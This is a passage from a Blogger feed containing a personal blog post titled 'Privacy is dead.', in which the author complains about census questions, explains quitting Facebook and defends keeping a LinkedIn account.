seemed like an absolutely ridiculous invasion of privacy in my opinion.. I pay taxes, you know who I am, where I live, who I'm married to and how many children I do or do not have, why the 'anonymous' survey? I decided to say screw it &amp;amp; not fill out the Census form. 
Sure the TV told me it was important and 'required' but it also said the survey was 'completely anonymous' so how would they know if I'd even filled it out or not? Well, two weeks later a nice woman came knocking on my door asking me all sorts of personal questions from the census committee. I was not pleased to say the least but felt cornered. When I'd asked how she found me if the census was anonymous the lady looked at me like I was a nut-job. Whatever.. you want to ask me questions, go ahead.. So I went along with it and started answering her questions.. The first thing she asked me for was my name.. Really? Do you not see the problem with an anonymous survey asking for your name... And I'm the crazy one right? &lt;br /&gt;&lt;br /&gt;In August 2010 I also decided to try out the whole FaceBook craze for the first time; up until then I had NEVER had an account-&amp;nbsp; I'd held out as long as possible but against my better judgement I signed up for an account. Within a few weeks I was tracking down everyone I could think of. It was kind of a sick obsession I suppose... People I went to high school with, friends from my childhood, people I'd met on vacation.. Of course it was nice keeping in touch with family that I hadn't seen or spoken with in a long time but then again, those same family members never once picked up the telephone to call me and say hello. Half of them didn't even come to my wedding so why did I want to be connected to them so badly online? It seemed like a game - how many 'friends' could I have, did I have more than other people? Look, I just got a puppy, here's his picture. Oh, I went on a cruise, check out the scenery.. After a few months it occurred to me that FaceBook was an extremely bad idea. 
People are haters - half the 'friends' I'd hooked up with were simply using FaceBook to glean information for their gossip circles and the other half really didn't care what was going on in my life.&lt;br /&gt;&lt;br /&gt;So, after just 4 months, I decided to permanently close my FaceBook account- it was my New Year resolution and I'm proud to say that today, I'm 282 days sober. Not a single relapse.. I gotta admit I really wasn't sure if I was going to miss it but looking back, I now see how much more productive and private my life is. Sure my friends and family are still all on there but I really don't care. I still keep in touch with everyone that matters so what difference does it make... Something about having a database full of people's real names, photos and contacts just doesn't sit right with me.&lt;br /&gt;&lt;br /&gt;I suppose I'm a bit of a hypocrite for having a LinkedIn account.. but in my defense, that actually does have legitimate uses. I've gotten my last 2 jobs through LinkedIn. I think of it more as an online resume than social media site however I'm sure others out there would disagree. At least with LinkedIn I can remain somewhat hidden though as I refuse to post a real picture of myself and rarely add people I haven't actually done business with.&lt;br /&gt;&lt;br /&gt;It'll be interesting to see if people start wising up to their lack of privacy. You see stories on the news every once in a while about it but I doubt most people take them seriously. I'm still convinced that someone will eventually figure out how to leverage social media for illicit purposes if they haven't already. Ok.. 
enough ranting, that's all for today.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1457795419029305522?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/1457795419029305522/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/privacy-is-dead.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1457795419029305522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1457795419029305522'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/privacy-is-dead.html' title='Privacy is dead.'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry></feed>
